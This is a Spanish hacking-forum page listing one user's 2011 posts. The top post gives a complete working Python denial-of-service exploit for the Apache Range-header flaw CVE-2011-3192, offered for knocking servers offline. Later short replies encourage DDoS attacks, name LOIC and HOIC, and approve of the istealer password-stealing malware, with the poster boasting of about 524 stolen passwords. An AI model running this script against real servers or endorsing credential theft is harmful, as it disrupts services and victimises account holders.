Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Pr0ph3t

Páginas 1 ... 17 18 19 20

#361

Python / Python Apache Killer (Range Header DoS CVE-2011-3192)

Noviembre 28, 2011, 08:52:09 PM

Os dejo este code, que sirve para tirar servidores Apache (No todos)

Código: python

#!/usr/bin/env python

import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse

NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION = "0.1d"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "Public domain (FREE)"

SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
USER_AGENT = "KillApachePy (%s)" % VERSION

def attack(url, user_agent=None, method='GET', proxy=None):
    url = ("http://%s" % url) if '://' not in url else url
    host = urlparse.urlparse(url).netloc

    if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
        print "(x) Invalid proxy address used"
        exit(-1)

    proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)

    class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
        def set_method(self, method):
            self.method = method.upper()

        def get_method(self):
            return getattr(self, 'method', urllib2.Request.get_method(self))

    def _send(check=False): #Send the vulnerable request to the target
        if check:
            print "(i) Checking target for vulnerability..."
        payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
        try:
            headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
            req = _MethodRequest(url, None, headers)
            req.set_method(method)
            response = urllib2.urlopen(req)
            if check:
                return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
        except urllib2.URLError, msg:
            if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
                pass
            elif 'timed out' in str(msg):
                print "\r(i) Server seems to be choked ('%s')" % msg
            else:
                print "(x) Connection error ('%s')" % msg
                if check or 'Forbidden' in str(msg):
                    os._exit(-1)
        except Exception, msg:
            raise

    try:
        if not _send(check=True):
            print "(x) Target does not seem to be vulnerable"
        else:
            print "(o) Target seems to be vulnerable\n"
            quit = False
            while not quit:
                threads = []
                print "(i) Creating new threads..."
                try:
                    while True:
                        thread = threading.Thread(target=_send)
                        thread.start()
                        threads.append(thread)
                except KeyboardInterrupt:
                    quit = True
                    raise
                except Exception, msg:
                    if 'new thread' in str(msg):
                        print "(i) Maximum number of new threads created (%d)" % len(threads)
                    else:
                        print "(x) Exception occured ('%s')" % msg
                finally:
                    if not quit:
                        print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
                        time.sleep(SLEEP_TIME)
                        print
    except KeyboardInterrupt:
        print "\r(x) Ctrl-C was pressed"
        os._exit(1)

if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
    parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
    parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
    parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
    options, _ = parser.parse_args()
    if options.url:
        result = attack(options.url, options.agent, options.method, options.proxy)
    else:
        parser.print_help()

Un saludo.

#362

Dudas y pedidos generales / Re:Quiero crear mi website con dominio .com pero no se que host elegir

Noviembre 28, 2011, 06:02:49 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pues da igual cuanto sea, pero si es más de 3 meses estaría bien. Un año nada mal. Bueno espero tu respuesta.

Ahora te digo

EDIT: MP!

#363

Dudas y pedidos generales / Re:Quiero crear mi website con dominio .com pero no se que host elegir

Noviembre 28, 2011, 05:50:37 PM

20 € por cuanto tiempo? te puedo conseguir un buen precio.

#364

Zona Webmaster / Re:Manual HTML5

Noviembre 27, 2011, 08:24:01 AM

Ahora me lo leo, me estoy planteando hacer cositas en html5.

Un saludo .

#365

Bugs y Exploits / Re:Rootear Servidores Linux By Nort4x

Noviembre 23, 2011, 08:26:50 AM

Lo estaba buscando, gracias

#366

Bugs y Exploits / Re:DDos Attack (explicacion) Mediante CMD

Noviembre 21, 2011, 03:42:26 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
CON ESE ATAQUE YA NO SE HACE CASI NADA HERMANO, DEBERÍAN USAR SCRIPTS PARA PERL O PYTHON, QUE ESOS SCRIPTS SI PUEDEN LLEGAR A COLAPSAR UN SERVIDOR O UNA PC. PERO IGUALMENTE SE PEUDE CON ESO SI LO ABRES UNAS 1.000 VECES JKASDJKASDJKAS SALUDOS.

Bueno, está bueno el aporte para saber como funciona un DDOS, y por lo menos él aporta y no floodea todo el foro poniendo mensajes en negrita y mayúscula.
Como sigas asi se tomarán medidas.

Dr0b4ck buen aporte, gracias.

#367

Dudas y pedidos generales / Re:yo no se nada de malwares

Noviembre 19, 2011, 06:35:17 PM

Si con lo de personalizar uno te refieres a codearlo, deberias aprender a programar...

#368

Códigos Fuentes / Re:[SC]HOIC modificado by CrashOverrider:

Noviembre 19, 2011, 03:29:42 PM

Muy bueno hackw32, gracias por traerlo

#369

Dudas y pedidos generales / Re:[Ayuda]Spammer face

Noviembre 17, 2011, 06:05:12 PM

Ah si usas linux no creo que te hay pasado nada.

#370

Dudas y pedidos generales / Re:[Ayuda]Spammer face

Noviembre 17, 2011, 04:19:13 PM

Lol te han infectado... Y eso que dices que publica en los muros es un spreader, lee sobre ello.

#371

Tutoriales y Manuales de Malwares / Re:Sitios para escanear tu servidor

Noviembre 16, 2011, 03:47:02 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
en myavscan me detecta 4 infectados y en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login me detecta 9...y resulta que los que me detecta esa pagina no me los detecta los antivirus..esa pagina da bien los resultados??,es que estoy mod y me lio con los scans...cual seria el escaner mas efectivo?,gracias chicos por las paginas de escaneres

Muchas veces los scanners online fallan, o es que tus antivirus están desactualizados.

#372

Dudas y pedidos generales / Re:No se por donde empezar

Noviembre 12, 2011, 12:46:23 PM

Yo te recomiendo que empieces por la que más te guste y te parezca más interesante.

#373

Dudas y pedidos generales / Re:AYUDA, PROBLEMA CON WIFIWAY[HACKEAR WIFI]

Noviembre 09, 2011, 02:50:24 PM

No se ve lo que dice en la imagen, es demasiado pequeña.

#374

Dudas y pedidos generales / Re:ocultar tu ip y no ser detectado

Noviembre 09, 2011, 01:58:04 PM

Puedes usar un VPN o un Proxy, si usas VPN sería mejor que fuera de pago ya que pueden vender datos a terceros. Te recomiendo Cyberghost, tambien es free y para mi fiable.

#375

Dudas y pedidos generales / Re:Es seguro usar loic de anonymous?

Noviembre 08, 2011, 05:26:53 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Cual es mejor?

Lo que pasa es que para windows no conozco ninguna, yo hablo para bt.

#376

Dudas y pedidos generales / Re:Es seguro usar loic de anonymous?

Noviembre 08, 2011, 05:19:53 PM

Hay mas herramientas que loic para ddosear.

#377

Dudas y pedidos generales / Re:duda atacar ip con ddos

Noviembre 04, 2011, 01:37:24 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
a buenisimo lo voy a probar

No está bien hacer eso pero... Cada uno es como es...

#378

Dudas y pedidos generales / Re:[ayuda] Metasploit

Noviembre 04, 2011, 11:58:18 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Podria instalar backtrack en virtual box y ejecutar un scaneo a una pc fuera de mi red para saber su seguridad?

un saludo compañeros

Sí, claro que puedes.

#379

Dudas y pedidos generales / Re:duda atacar ip con ddos

Noviembre 04, 2011, 11:57:19 AM

Si, le podrias joder la conexion a internet, o eso tengo entendido.

#380

Dudas y pedidos generales / Re:Necesito ayuda con istealer legende 6.3

Noviembre 02, 2011, 07:11:16 PM

No pasa nada bro, cualquier duda está bien que se pregunte, usalo bien que está buenisimo, tengo unas 524 pass... xD
Cierro tema.

Páginas 1 ... 17 18 19 20